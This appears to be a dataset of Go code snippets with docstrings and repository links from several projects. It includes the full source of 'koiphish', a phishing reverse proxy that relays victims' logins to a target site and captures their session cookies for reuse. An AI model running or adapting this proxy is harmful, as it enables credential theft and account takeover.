return perrors.Errorf("ioutil.ReadFile(file:%s) = error:%v", logConfFile, err)
}
conf := &zap.Config{}
err = yaml.Unmarshal(confFileStream, conf)
if err != nil {
InitLogger(nil)
return perrors.Errorf("[Unmarshal]init logger error: %v", err)
}
InitLogger(conf)
return nil
}
func InitLogger(conf *zap.Config) {
var zapLoggerConfig zap.Config
if conf == nil {
zapLoggerEncoderConfig := zapcore.EncoderConfig{
TimeKey: "time",
LevelKey: "level",
NameKey: "logger",
CallerKey: "caller",
MessageKey: "message",
StacktraceKey: "stacktrace",
EncodeLevel: zapcore.CapitalColorLevelEncoder,
EncodeTime: zapcore.ISO8601TimeEncoder,
EncodeDuration: zapcore.SecondsDurationEncoder,
EncodeCaller: zapcore.ShortCallerEncoder,
}
zapLoggerConfig = zap.Config{
Level: zap.NewAtomicLevelAt(zap.DebugLevel),
Development: false,
Encoding: "console",
EncoderConfig: zapLoggerEncoderConfig,
OutputPaths: []string{"stderr"},
ErrorOutputPaths: []string{"stderr"},
}
} else {
zapLoggerConfig = *conf
}
zapLogger, _ := zapLoggerConfig.Build(zap.AddCallerSkip(1))
logger = &DubboLogger{Logger: zapLogger.Sugar(), dynamicLevel: zapLoggerConfig.Level}
getty.SetLogger(logger)
}
func SetLogger(log Logger) {
logger = log
getty.SetLogger(logger)
}
func GetLogger() Logger {
return logger
} | Apache License 2.0 |
yunify/qingcloud-cloud-controller-manager | pkg/qingcloud/qingcloud.go | GetLoadBalancerName | go | func (qc *QingCloud) GetLoadBalancerName(_ context.Context, _ string, service *v1.Service) string {
return ""
} | GetLoadBalancerName returns the name of the load balancer. Implementations must treat the
*v1.Service parameter as read-only and not modify it. | https://github.com/yunify/qingcloud-cloud-controller-manager/blob/eb4e273bed2e21918821fd23ef5b4b4c9724d52d/pkg/qingcloud/qingcloud.go#L139-L141 | package qingcloud
import (
"context"
"fmt"
"github.com/davecgh/go-spew/spew"
"github.com/yunify/qingcloud-cloud-controller-manager/pkg/apis"
"github.com/yunify/qingcloud-cloud-controller-manager/pkg/errors"
"github.com/yunify/qingcloud-cloud-controller-manager/pkg/executor"
yaml "gopkg.in/yaml.v2"
"io"
v1 "k8s.io/api/core/v1"
"k8s.io/client-go/informers"
corev1informer "k8s.io/client-go/informers/core/v1"
corev1 "k8s.io/client-go/kubernetes/typed/core/v1"
cloudprovider "k8s.io/cloud-provider"
"k8s.io/klog"
)
const (
ProviderName = "qingcloud"
QYConfigPath = "/etc/qingcloud/config.yaml"
)
type Config struct {
Zone string `yaml:"zone"`
DefaultVxNetForLB string `yaml:"defaultVxNetForLB,omitempty"`
ClusterID string `yaml:"clusterID"`
IsApp bool `yaml:"isApp,omitempty"`
TagIDs []string `yaml:"tagIDs,omitempty"`
InstanceIDs []string `yaml:"instanceIDs,omitempty"`
}
type QingCloud struct {
Config *Config
Client executor.QingCloudClientInterface
nodeInformer corev1informer.NodeInformer
serviceInformer corev1informer.ServiceInformer
corev1interface corev1.CoreV1Interface
}
func init() {
cloudprovider.RegisterCloudProvider(ProviderName, func(config io.Reader) (cloudprovider.Interface, error) {
return NewQingCloud(config)
})
}
func NewQingCloud(cfg io.Reader) (cloudprovider.Interface, error) {
if cfg == nil {
return nil, fmt.Errorf("no qingcloud provider Config file given")
}
var (
config Config
)
err := yaml.NewDecoder(cfg).Decode(&config)
if err != nil {
return nil, fmt.Errorf("failed to decode Config file, err=%v", err)
}
client, err := executor.NewQingCloudClient(&executor.ClientConfig{
IsAPP: config.IsApp,
TagIDs: config.TagIDs,
}, QYConfigPath)
if err != nil {
return nil, err
}
qc := QingCloud{
Config: &config,
Client: client,
}
return &qc, nil
}
func (qc *QingCloud) Initialize(clientBuilder cloudprovider.ControllerClientBuilder, stop <-chan struct{}) {
clientset := clientBuilder.ClientOrDie("do-shared-informers")
sharedInformer := informers.NewSharedInformerFactory(clientset, 0)
nodeinformer := sharedInformer.Core().V1().Nodes()
go nodeinformer.Informer().Run(stop)
qc.nodeInformer = nodeinformer
serviceInformer := sharedInformer.Core().V1().Services()
go serviceInformer.Informer().Run(stop)
qc.serviceInformer = serviceInformer
qc.corev1interface = clientset.CoreV1()
}
func (qc *QingCloud) Clusters() (cloudprovider.Clusters, bool) {
return nil, false
}
func (qc *QingCloud) Routes() (cloudprovider.Routes, bool) {
return nil, false
}
func (qc *QingCloud) ProviderName() string {
return ProviderName
}
func (qc *QingCloud) Instances() (cloudprovider.Instances, bool) {
return nil, false
}
func (qc *QingCloud) InstancesV2() (cloudprovider.InstancesV2, bool) {
return nil, false
}
func (qc *QingCloud) Zones() (cloudprovider.Zones, bool) {
return nil, false
}
func (qc *QingCloud) HasClusterID() bool {
return qc.Config.ClusterID != ""
}
func (qc *QingCloud) LoadBalancer() (cloudprovider.LoadBalancer, bool) {
return qc, true
} | Apache License 2.0 |
openebs/dynamic-nfs-provisioner | pkg/kubernetes/api/core/v1/persistentvolumeclaim/buildlist.go | ListBuilderForObjects | go | func ListBuilderForObjects(pvcs *PVCList) *ListBuilder {
b := &ListBuilder{}
if pvcs == nil {
b.errs = append(
b.errs,
errors.New("failed to build pvc list: missing object list"),
)
return b
}
b.list = pvcs
return b
} | ListBuilderForObjects returns a new instance of
ListBuilder based on the provided pvc list | https://github.com/openebs/dynamic-nfs-provisioner/blob/b410fa595e561c38d433291ada1d9709177d6b53/pkg/kubernetes/api/core/v1/persistentvolumeclaim/buildlist.go#L85-L97 | package persistentvolumeclaim
import (
errors "github.com/pkg/errors"
corev1 "k8s.io/api/core/v1"
)
type ListBuilder struct {
template *corev1.PersistentVolumeClaim
count int
list *PVCList
filters PredicateList
errs []error
}
func NewListBuilder() *ListBuilder {
return &ListBuilder{list: &PVCList{}}
}
func ListBuilderFromTemplate(pvc *corev1.PersistentVolumeClaim) *ListBuilder {
b := NewListBuilder()
if pvc == nil {
b.errs = append(
b.errs,
errors.New("failed to build pvc list: nil pvc template"),
)
return b
}
b.template = pvc
b.count = 1
return b
}
func ListBuilderForAPIObjects(pvcs *corev1.PersistentVolumeClaimList) *ListBuilder {
b := &ListBuilder{list: &PVCList{}}
if pvcs == nil {
b.errs = append(
b.errs,
errors.New("failed to build pvc list: missing api list"),
)
return b
}
for _, pvc := range pvcs.Items {
pvc := pvc
b.list.items = append(b.list.items, &PVC{object: &pvc})
}
return b
} | Apache License 2.0 |
godwhoa/wsrooms | room.go | BroadcastAll | go | func (r *Room) BroadcastAll(msg []byte) {
for _, client := range r.clients {
client.WriteMessage(msg)
}
} | Broadcast to every client | https://github.com/godwhoa/wsrooms/blob/b928e4438a10d038b7eef219ec6cd840b7659fb5/room.go#L38-L42 | package main
import (
"log"
"github.com/gorilla/websocket"
)
type Room struct {
name string
clients map[int]*Client
count int
index int
}
func (r *Room) Join(conn *websocket.Conn) int {
r.index++
r.clients[r.index] = NewClient(conn)
log.Printf("New Client joined %s", r.name)
r.count++
return r.index
}
func (r *Room) Leave(id int) {
r.count--
delete(r.clients, id)
}
func (r *Room) SendTo(id int, msg []byte) {
r.clients[id].WriteMessage(msg)
} | MIT License |
ent/contrib | entproto/internal/entprototest/ent/user_query.go | StringsX | go | func (ugb *UserGroupBy) StringsX(ctx context.Context) []string {
v, err := ugb.Strings(ctx)
if err != nil {
panic(err)
}
return v
} | StringsX is like Strings, but panics if an error occurs. | https://github.com/ent/contrib/blob/2f98d3a15e7dfcc96aa696a5aceb0c8b1249f9e4/entproto/internal/entprototest/ent/user_query.go#L621-L627 | package ent
import (
"context"
"database/sql/driver"
"errors"
"fmt"
"math"
"entgo.io/contrib/entproto/internal/entprototest/ent/blogpost"
"entgo.io/contrib/entproto/internal/entprototest/ent/image"
"entgo.io/contrib/entproto/internal/entprototest/ent/predicate"
"entgo.io/contrib/entproto/internal/entprototest/ent/user"
"entgo.io/ent/dialect/sql"
"entgo.io/ent/dialect/sql/sqlgraph"
"entgo.io/ent/schema/field"
"github.com/google/uuid"
)
type UserQuery struct {
config
limit *int
offset *int
unique *bool
order []OrderFunc
fields []string
predicates []predicate.User
withBlogPosts *BlogPostQuery
withProfilePic *ImageQuery
withFKs bool
sql *sql.Selector
path func(context.Context) (*sql.Selector, error)
}
func (uq *UserQuery) Where(ps ...predicate.User) *UserQuery {
uq.predicates = append(uq.predicates, ps...)
return uq
}
func (uq *UserQuery) Limit(limit int) *UserQuery {
uq.limit = &limit
return uq
}
func (uq *UserQuery) Offset(offset int) *UserQuery {
uq.offset = &offset
return uq
}
func (uq *UserQuery) Unique(unique bool) *UserQuery {
uq.unique = &unique
return uq
}
func (uq *UserQuery) Order(o ...OrderFunc) *UserQuery {
uq.order = append(uq.order, o...)
return uq
}
func (uq *UserQuery) QueryBlogPosts() *BlogPostQuery {
query := &BlogPostQuery{config: uq.config}
query.path = func(ctx context.Context) (fromU *sql.Selector, err error) {
if err := uq.prepareQuery(ctx); err != nil {
return nil, err
}
selector := uq.sqlQuery(ctx)
if err := selector.Err(); err != nil {
return nil, err
}
step := sqlgraph.NewStep(
sqlgraph.From(user.Table, user.FieldID, selector),
sqlgraph.To(blogpost.Table, blogpost.FieldID),
sqlgraph.Edge(sqlgraph.O2M, true, user.BlogPostsTable, user.BlogPostsColumn),
)
fromU = sqlgraph.SetNeighbors(uq.driver.Dialect(), step)
return fromU, nil
}
return query
}
func (uq *UserQuery) QueryProfilePic() *ImageQuery {
query := &ImageQuery{config: uq.config}
query.path = func(ctx context.Context) (fromU *sql.Selector, err error) {
if err := uq.prepareQuery(ctx); err != nil {
return nil, err
}
selector := uq.sqlQuery(ctx)
if err := selector.Err(); err != nil {
return nil, err
}
step := sqlgraph.NewStep(
sqlgraph.From(user.Table, user.FieldID, selector),
sqlgraph.To(image.Table, image.FieldID),
sqlgraph.Edge(sqlgraph.M2O, false, user.ProfilePicTable, user.ProfilePicColumn),
)
fromU = sqlgraph.SetNeighbors(uq.driver.Dialect(), step)
return fromU, nil
}
return query
}
func (uq *UserQuery) First(ctx context.Context) (*User, error) {
nodes, err := uq.Limit(1).All(ctx)
if err != nil {
return nil, err
}
if len(nodes) == 0 {
return nil, &NotFoundError{user.Label}
}
return nodes[0], nil
}
func (uq *UserQuery) FirstX(ctx context.Context) *User {
node, err := uq.First(ctx)
if err != nil && !IsNotFound(err) {
panic(err)
}
return node
}
func (uq *UserQuery) FirstID(ctx context.Context) (id int, err error) {
var ids []int
if ids, err = uq.Limit(1).IDs(ctx); err != nil {
return
}
if len(ids) == 0 {
err = &NotFoundError{user.Label}
return
}
return ids[0], nil
}
func (uq *UserQuery) FirstIDX(ctx context.Context) int {
id, err := uq.FirstID(ctx)
if err != nil && !IsNotFound(err) {
panic(err)
}
return id
}
func (uq *UserQuery) Only(ctx context.Context) (*User, error) {
nodes, err := uq.Limit(2).All(ctx)
if err != nil {
return nil, err
}
switch len(nodes) {
case 1:
return nodes[0], nil
case 0:
return nil, &NotFoundError{user.Label}
default:
return nil, &NotSingularError{user.Label}
}
}
func (uq *UserQuery) OnlyX(ctx context.Context) *User {
node, err := uq.Only(ctx)
if err != nil {
panic(err)
}
return node
}
func (uq *UserQuery) OnlyID(ctx context.Context) (id int, err error) {
var ids []int
if ids, err = uq.Limit(2).IDs(ctx); err != nil {
return
}
switch len(ids) {
case 1:
id = ids[0]
case 0:
err = &NotFoundError{user.Label}
default:
err = &NotSingularError{user.Label}
}
return
}
func (uq *UserQuery) OnlyIDX(ctx context.Context) int {
id, err := uq.OnlyID(ctx)
if err != nil {
panic(err)
}
return id
}
func (uq *UserQuery) All(ctx context.Context) ([]*User, error) {
if err := uq.prepareQuery(ctx); err != nil {
return nil, err
}
return uq.sqlAll(ctx)
}
func (uq *UserQuery) AllX(ctx context.Context) []*User {
nodes, err := uq.All(ctx)
if err != nil {
panic(err)
}
return nodes
}
func (uq *UserQuery) IDs(ctx context.Context) ([]int, error) {
var ids []int
if err := uq.Select(user.FieldID).Scan(ctx, &ids); err != nil {
return nil, err
}
return ids, nil
}
func (uq *UserQuery) IDsX(ctx context.Context) []int {
ids, err := uq.IDs(ctx)
if err != nil {
panic(err)
}
return ids
}
func (uq *UserQuery) Count(ctx context.Context) (int, error) {
if err := uq.prepareQuery(ctx); err != nil {
return 0, err
}
return uq.sqlCount(ctx)
}
func (uq *UserQuery) CountX(ctx context.Context) int {
count, err := uq.Count(ctx)
if err != nil {
panic(err)
}
return count
}
func (uq *UserQuery) Exist(ctx context.Context) (bool, error) {
if err := uq.prepareQuery(ctx); err != nil {
return false, err
}
return uq.sqlExist(ctx)
}
func (uq *UserQuery) ExistX(ctx context.Context) bool {
exist, err := uq.Exist(ctx)
if err != nil {
panic(err)
}
return exist
}
func (uq *UserQuery) Clone() *UserQuery {
if uq == nil {
return nil
}
return &UserQuery{
config: uq.config,
limit: uq.limit,
offset: uq.offset,
order: append([]OrderFunc{}, uq.order...),
predicates: append([]predicate.User{}, uq.predicates...),
withBlogPosts: uq.withBlogPosts.Clone(),
withProfilePic: uq.withProfilePic.Clone(),
sql: uq.sql.Clone(),
path: uq.path,
}
}
func (uq *UserQuery) WithBlogPosts(opts ...func(*BlogPostQuery)) *UserQuery {
query := &BlogPostQuery{config: uq.config}
for _, opt := range opts {
opt(query)
}
uq.withBlogPosts = query
return uq
}
func (uq *UserQuery) WithProfilePic(opts ...func(*ImageQuery)) *UserQuery {
query := &ImageQuery{config: uq.config}
for _, opt := range opts {
opt(query)
}
uq.withProfilePic = query
return uq
}
func (uq *UserQuery) GroupBy(field string, fields ...string) *UserGroupBy {
group := &UserGroupBy{config: uq.config}
group.fields = append([]string{field}, fields...)
group.path = func(ctx context.Context) (prev *sql.Selector, err error) {
if err := uq.prepareQuery(ctx); err != nil {
return nil, err
}
return uq.sqlQuery(ctx), nil
}
return group
}
func (uq *UserQuery) Select(fields ...string) *UserSelect {
uq.fields = append(uq.fields, fields...)
return &UserSelect{UserQuery: uq}
}
func (uq *UserQuery) prepareQuery(ctx context.Context) error {
for _, f := range uq.fields {
if !user.ValidColumn(f) {
return &ValidationError{Name: f, err: fmt.Errorf("ent: invalid field %q for query", f)}
}
}
if uq.path != nil {
prev, err := uq.path(ctx)
if err != nil {
return err
}
uq.sql = prev
}
return nil
}
func (uq *UserQuery) sqlAll(ctx context.Context) ([]*User, error) {
var (
nodes = []*User{}
withFKs = uq.withFKs
_spec = uq.querySpec()
loadedTypes = [2]bool{
uq.withBlogPosts != nil,
uq.withProfilePic != nil,
}
)
if uq.withProfilePic != nil {
withFKs = true
}
if withFKs {
_spec.Node.Columns = append(_spec.Node.Columns, user.ForeignKeys...)
}
_spec.ScanValues = func(columns []string) ([]interface{}, error) {
node := &User{config: uq.config}
nodes = append(nodes, node)
return node.scanValues(columns)
}
_spec.Assign = func(columns []string, values []interface{}) error {
if len(nodes) == 0 {
return fmt.Errorf("ent: Assign called without calling ScanValues")
}
node := nodes[len(nodes)-1]
node.Edges.loadedTypes = loadedTypes
return node.assignValues(columns, values)
}
if err := sqlgraph.QueryNodes(ctx, uq.driver, _spec); err != nil {
return nil, err
}
if len(nodes) == 0 {
return nodes, nil
}
if query := uq.withBlogPosts; query != nil {
fks := make([]driver.Value, 0, len(nodes))
nodeids := make(map[int]*User)
for i := range nodes {
fks = append(fks, nodes[i].ID)
nodeids[nodes[i].ID] = nodes[i]
nodes[i].Edges.BlogPosts = []*BlogPost{}
}
query.withFKs = true
query.Where(predicate.BlogPost(func(s *sql.Selector) {
s.Where(sql.InValues(user.BlogPostsColumn, fks...))
}))
neighbors, err := query.All(ctx)
if err != nil {
return nil, err
}
for _, n := range neighbors {
fk := n.blog_post_author
if fk == nil {
return nil, fmt.Errorf(`foreign-key "blog_post_author" is nil for node %v`, n.ID)
}
node, ok := nodeids[*fk]
if !ok {
return nil, fmt.Errorf(`unexpected foreign-key "blog_post_author" returned %v for node %v`, *fk, n.ID)
}
node.Edges.BlogPosts = append(node.Edges.BlogPosts, n)
}
}
if query := uq.withProfilePic; query != nil {
ids := make([]uuid.UUID, 0, len(nodes))
nodeids := make(map[uuid.UUID][]*User)
for i := range nodes {
if nodes[i].user_profile_pic == nil {
continue
}
fk := *nodes[i].user_profile_pic
if _, ok := nodeids[fk]; !ok {
ids = append(ids, fk)
}
nodeids[fk] = append(nodeids[fk], nodes[i])
}
query.Where(image.IDIn(ids...))
neighbors, err := query.All(ctx)
if err != nil {
return nil, err
}
for _, n := range neighbors {
nodes, ok := nodeids[n.ID]
if !ok {
return nil, fmt.Errorf(`unexpected foreign-key "user_profile_pic" returned %v`, n.ID)
}
for i := range nodes {
nodes[i].Edges.ProfilePic = n
}
}
}
return nodes, nil
}
func (uq *UserQuery) sqlCount(ctx context.Context) (int, error) {
_spec := uq.querySpec()
return sqlgraph.CountNodes(ctx, uq.driver, _spec)
}
func (uq *UserQuery) sqlExist(ctx context.Context) (bool, error) {
n, err := uq.sqlCount(ctx)
if err != nil {
return false, fmt.Errorf("ent: check existence: %w", err)
}
return n > 0, nil
}
func (uq *UserQuery) querySpec() *sqlgraph.QuerySpec {
_spec := &sqlgraph.QuerySpec{
Node: &sqlgraph.NodeSpec{
Table: user.Table,
Columns: user.Columns,
ID: &sqlgraph.FieldSpec{
Type: field.TypeInt,
Column: user.FieldID,
},
},
From: uq.sql,
Unique: true,
}
if unique := uq.unique; unique != nil {
_spec.Unique = *unique
}
if fields := uq.fields; len(fields) > 0 {
_spec.Node.Columns = make([]string, 0, len(fields))
_spec.Node.Columns = append(_spec.Node.Columns, user.FieldID)
for i := range fields {
if fields[i] != user.FieldID {
_spec.Node.Columns = append(_spec.Node.Columns, fields[i])
}
}
}
if ps := uq.predicates; len(ps) > 0 {
_spec.Predicate = func(selector *sql.Selector) {
for i := range ps {
ps[i](selector)
}
}
}
if limit := uq.limit; limit != nil {
_spec.Limit = *limit
}
if offset := uq.offset; offset != nil {
_spec.Offset = *offset
}
if ps := uq.order; len(ps) > 0 {
_spec.Order = func(selector *sql.Selector) {
for i := range ps {
ps[i](selector)
}
}
}
return _spec
}
func (uq *UserQuery) sqlQuery(ctx context.Context) *sql.Selector {
builder := sql.Dialect(uq.driver.Dialect())
t1 := builder.Table(user.Table)
columns := uq.fields
if len(columns) == 0 {
columns = user.Columns
}
selector := builder.Select(t1.Columns(columns...)...).From(t1)
if uq.sql != nil {
selector = uq.sql
selector.Select(selector.Columns(columns...)...)
}
for _, p := range uq.predicates {
p(selector)
}
for _, p := range uq.order {
p(selector)
}
if offset := uq.offset; offset != nil {
selector.Offset(*offset).Limit(math.MaxInt32)
}
if limit := uq.limit; limit != nil {
selector.Limit(*limit)
}
return selector
}
type UserGroupBy struct {
config
fields []string
fns []AggregateFunc
sql *sql.Selector
path func(context.Context) (*sql.Selector, error)
}
func (ugb *UserGroupBy) Aggregate(fns ...AggregateFunc) *UserGroupBy {
ugb.fns = append(ugb.fns, fns...)
return ugb
}
func (ugb *UserGroupBy) Scan(ctx context.Context, v interface{}) error {
query, err := ugb.path(ctx)
if err != nil {
return err
}
ugb.sql = query
return ugb.sqlScan(ctx, v)
}
func (ugb *UserGroupBy) ScanX(ctx context.Context, v interface{}) {
if err := ugb.Scan(ctx, v); err != nil {
panic(err)
}
}
func (ugb *UserGroupBy) Strings(ctx context.Context) ([]string, error) {
if len(ugb.fields) > 1 {
return nil, errors.New("ent: UserGroupBy.Strings is not achievable when grouping more than 1 field")
}
var v []string
if err := ugb.Scan(ctx, &v); err != nil {
return nil, err
}
return v, nil
} | Apache License 2.0 |
wunderwuzzi23/koiphish | koiphish.go | blackholeRequest | go | func blackholeRequest(w http.ResponseWriter, r *http.Request) {
http.Error(w, "Not applicable.", http.StatusBadRequest)
return
} | Handler to ignore requests | https://github.com/wunderwuzzi23/koiphish/blob/0772037b647f68dafe9db2794b9a1b0d4189f39f/koiphish.go#L279-L282 | package main
import (
"bytes"
"compress/gzip"
"fmt"
"io/ioutil"
"log"
"net/http"
"net/http/httputil"
"net/url"
"os"
"strings"
"time"
)
const _target string = "<put_target_server>"
const _sourceHost string = "localhost"
const _successRoute = "/CheckCookie"
var _cookiesToLookFor = map[string]string{}
var _requestsToDump = []string{"_/signin/sl/challenge", "_/signin/sl/lookup"}
var _requestsToIgnore = []string{"/_/common/diagnostics", "/cspreport", "/jserror", "/info"}
var _addtionalCustomBodyRewrites = []string{}
var _targetURL *url.URL
var _targetDomain string
var _logfile *os.File
func initialize() {
starttime := time.Now()
os.Mkdir("logs", 0644)
filename := "./logs/koiphish." + starttime.Format("2006-01-02_150405") + ".log"
_logfile, err := os.OpenFile(filename, os.O_CREATE|os.O_WRONLY, 0644)
if err != nil {
log.Println(err)
}
log.SetOutput(_logfile)
_targetURL, err = url.Parse(_target)
if err != nil {
panic(err)
}
_targetDomain = _targetURL.Scheme + "://" + _targetURL.Host
log.Println("KoiPhish started.")
log.Println("Target: " + _targetDomain)
log.Println("Logfile: " + filename)
}
func checkForCookies(response *http.Response, content string) string {
cookies := ""
for i := 0; i < len(response.Cookies()); i++ {
currentCookie := response.Cookies()[i]
for name, domain := range _cookiesToLookFor {
if currentCookie.Name == name {
setcookie := "document.cookie=\"" + currentCookie.Name + "=" + currentCookie.Value + ";Domain=" + domain + "\""
cookies += setcookie + "\n"
log.Println(setcookie)
}
}
}
return cookies
}
func rewriteHeaders(request *http.Request, sourceRequest *http.Request) {
for key, value := range sourceRequest.Header {
neworig := strings.Replace(value[0], _sourceHost, _targetURL.Host, -1)
request.Header.Set(key, neworig)
}
request.Header.Set("Host", _targetURL.Host)
request.Header.Set("User-Agent", sourceRequest.UserAgent())
}
func main() {
initialize()
fmt.Println("KoiPhish started.")
http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
log.Println("Request " + r.RequestURI + " received from " + r.RemoteAddr)
dumpRequest(r)
updatedRequestURL := strings.Replace(r.RequestURI, _sourceHost, _targetURL.Host, -1)
destinationURL := _targetDomain + updatedRequestURL
request, _ := http.NewRequest(r.Method, destinationURL, r.Body)
if r.Method == "POST" {
postBody, err := ioutil.ReadAll(r.Body)
if err != nil {
log.Printf("Error reading post body: %v", err)
http.Error(w, "", http.StatusBadRequest)
return
}
analyzeBody(r, string(postBody))
postBodyString := strings.Replace(string(postBody), _sourceHost, _targetURL.Host, -1)
requestBody := bytes.NewReader([]byte(postBodyString))
request, err = http.NewRequest(r.Method,
destinationURL,
requestBody)
}
request.Header = r.Header
rewriteHeaders(request, r)
resp, err := http.DefaultClient.Do(request)
if err != nil {
log.Printf("Error issueing request: %v", err)
http.Error(w, "", http.StatusBadRequest)
return
}
defer resp.Body.Close()
dumpResponse(resp)
content, err := ioutil.ReadAll(resp.Body)
if err != nil {
log.Printf("Error reading uncompressed body: %v", err)
http.Error(w, "", http.StatusBadRequest)
return
}
if resp.Header.Get("Content-Encoding") == "gzip" {
content = decompress(content)
}
cookies := checkForCookies(resp, string(content))
if cookies != "" {
fmt.Println(cookies)
}
content = []byte(updateBody(string(content), _targetDomain))
if resp.Header.Get("Content-Encoding") == "gzip" {
content = compress(content)
}
for key, value := range resp.Header {
if key == "Content-Length" {
w.Header().Add(key, string(len(content)))
continue
}
for _, valueToSet := range value {
temp := strings.Split(_targetURL.Host, ".")
topLevel := "." + temp[len(temp)-2] + "." + temp[len(temp)-1]
if key == "Set-Cookie" {
valueToSet = strings.Replace(valueToSet, ";Domain="+topLevel, "", -1)
}
w.Header().Add(key, valueToSet)
}
}
w.Write(content)
})
http.HandleFunc(_successRoute, func(w http.ResponseWriter, r *http.Request) {
http.Redirect(w, r, _target, 302)
})
for i := 0; i < len(_requestsToIgnore); i++ {
http.HandleFunc(_requestsToIgnore[i], blackholeRequest)
}
http.ListenAndServeTLS(":443", "server.crt", "server.key", nil)
} | MIT License |
go-fed/activity | streams/impl/activitystreams/type_activity/gen_type_activitystreams_activity.go | GetActivityStreamsMediaType | go | func (this ActivityStreamsActivity) GetActivityStreamsMediaType() vocab.ActivityStreamsMediaTypeProperty {
return this.ActivityStreamsMediaType
} | GetActivityStreamsMediaType returns the "mediaType" property if it exists, and
nil otherwise. | https://github.com/go-fed/activity/blob/d866ba75dd0ff3ddd3a72b132b7cc16e01f6e006/streams/impl/activitystreams/type_activity/gen_type_activitystreams_activity.go#L592-L594 | package typeactivity
import (
"fmt"
vocab "github.com/go-fed/activity/streams/vocab"
"strings"
)
type ActivityStreamsActivity struct {
ActivityStreamsActor vocab.ActivityStreamsActorProperty
ActivityStreamsAltitude vocab.ActivityStreamsAltitudeProperty
ActivityStreamsAttachment vocab.ActivityStreamsAttachmentProperty
ActivityStreamsAttributedTo vocab.ActivityStreamsAttributedToProperty
ActivityStreamsAudience vocab.ActivityStreamsAudienceProperty
ActivityStreamsBcc vocab.ActivityStreamsBccProperty
ActivityStreamsBto vocab.ActivityStreamsBtoProperty
ActivityStreamsCc vocab.ActivityStreamsCcProperty
ActivityStreamsContent vocab.ActivityStreamsContentProperty
ActivityStreamsContext vocab.ActivityStreamsContextProperty
ActivityStreamsDuration vocab.ActivityStreamsDurationProperty
ActivityStreamsEndTime vocab.ActivityStreamsEndTimeProperty
ActivityStreamsGenerator vocab.ActivityStreamsGeneratorProperty
ActivityStreamsIcon vocab.ActivityStreamsIconProperty
JSONLDId vocab.JSONLDIdProperty
ActivityStreamsImage vocab.ActivityStreamsImageProperty
ActivityStreamsInReplyTo vocab.ActivityStreamsInReplyToProperty
ActivityStreamsInstrument vocab.ActivityStreamsInstrumentProperty
ActivityStreamsLikes vocab.ActivityStreamsLikesProperty
ActivityStreamsLocation vocab.ActivityStreamsLocationProperty
ActivityStreamsMediaType vocab.ActivityStreamsMediaTypeProperty
ActivityStreamsName vocab.ActivityStreamsNameProperty
ActivityStreamsObject vocab.ActivityStreamsObjectProperty
ActivityStreamsOrigin vocab.ActivityStreamsOriginProperty
ActivityStreamsPreview vocab.ActivityStreamsPreviewProperty
ActivityStreamsPublished vocab.ActivityStreamsPublishedProperty
ActivityStreamsReplies vocab.ActivityStreamsRepliesProperty
ActivityStreamsResult vocab.ActivityStreamsResultProperty
ActivityStreamsShares vocab.ActivityStreamsSharesProperty
ActivityStreamsSource vocab.ActivityStreamsSourceProperty
ActivityStreamsStartTime vocab.ActivityStreamsStartTimeProperty
ActivityStreamsSummary vocab.ActivityStreamsSummaryProperty
ActivityStreamsTag vocab.ActivityStreamsTagProperty
ActivityStreamsTarget vocab.ActivityStreamsTargetProperty
ForgeFedTeam vocab.ForgeFedTeamProperty
ForgeFedTicketsTrackedBy vocab.ForgeFedTicketsTrackedByProperty
ActivityStreamsTo vocab.ActivityStreamsToProperty
ForgeFedTracksTicketsFor vocab.ForgeFedTracksTicketsForProperty
JSONLDType vocab.JSONLDTypeProperty
ActivityStreamsUpdated vocab.ActivityStreamsUpdatedProperty
ActivityStreamsUrl vocab.ActivityStreamsUrlProperty
alias string
unknown map[string]interface{}
}
func ActivityIsDisjointWith(other vocab.Type) bool {
disjointWith := []string{"Link", "Mention"}
for _, disjoint := range disjointWith {
if disjoint == other.GetTypeName() {
return true
}
}
return false
}
func ActivityIsExtendedBy(other vocab.Type) bool {
extensions := []string{"Accept", "Add", "Announce", "Arrive", "Block", "Create", "Delete", "Dislike", "Flag", "Follow", "Ignore", "IntransitiveActivity", "Invite", "Join", "Leave", "Like", "Listen", "Move", "Offer", "Push", "Question", "Read", "Reject", "Remove", "TentativeAccept", "TentativeReject", "Travel", "Undo", "Update", "View"}
for _, ext := range extensions {
if ext == other.GetTypeName() {
return true
}
}
return false
}
func ActivityStreamsActivityExtends(other vocab.Type) bool {
extensions := []string{"Object"}
for _, ext := range extensions {
if ext == other.GetTypeName() {
return true
}
}
return false
}
func DeserializeActivity(m map[string]interface{}, aliasMap map[string]string) (*ActivityStreamsActivity, error) {
alias := ""
aliasPrefix := ""
if a, ok := aliasMap["https://www.w3.org/ns/activitystreams"]; ok {
alias = a
aliasPrefix = a + ":"
}
this := &ActivityStreamsActivity{
alias: alias,
unknown: make(map[string]interface{}),
}
if typeValue, ok := m["type"]; !ok {
return nil, fmt.Errorf("no \"type\" property in map")
} else if typeString, ok := typeValue.(string); ok {
typeName := strings.TrimPrefix(typeString, aliasPrefix)
if typeName != "Activity" {
return nil, fmt.Errorf("\"type\" property is not of %q type: %s", "Activity", typeName)
}
} else if arrType, ok := typeValue.([]interface{}); ok {
found := false
for _, elemVal := range arrType {
if typeString, ok := elemVal.(string); ok && strings.TrimPrefix(typeString, aliasPrefix) == "Activity" {
found = true
break
}
}
if !found {
return nil, fmt.Errorf("could not find a \"type\" property of value %q", "Activity")
}
} else {
return nil, fmt.Errorf("\"type\" property is unrecognized type: %T", typeValue)
}
if p, err := mgr.DeserializeActorPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsActor = p
}
if p, err := mgr.DeserializeAltitudePropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsAltitude = p
}
if p, err := mgr.DeserializeAttachmentPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsAttachment = p
}
if p, err := mgr.DeserializeAttributedToPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsAttributedTo = p
}
if p, err := mgr.DeserializeAudiencePropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsAudience = p
}
if p, err := mgr.DeserializeBccPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsBcc = p
}
if p, err := mgr.DeserializeBtoPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsBto = p
}
if p, err := mgr.DeserializeCcPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
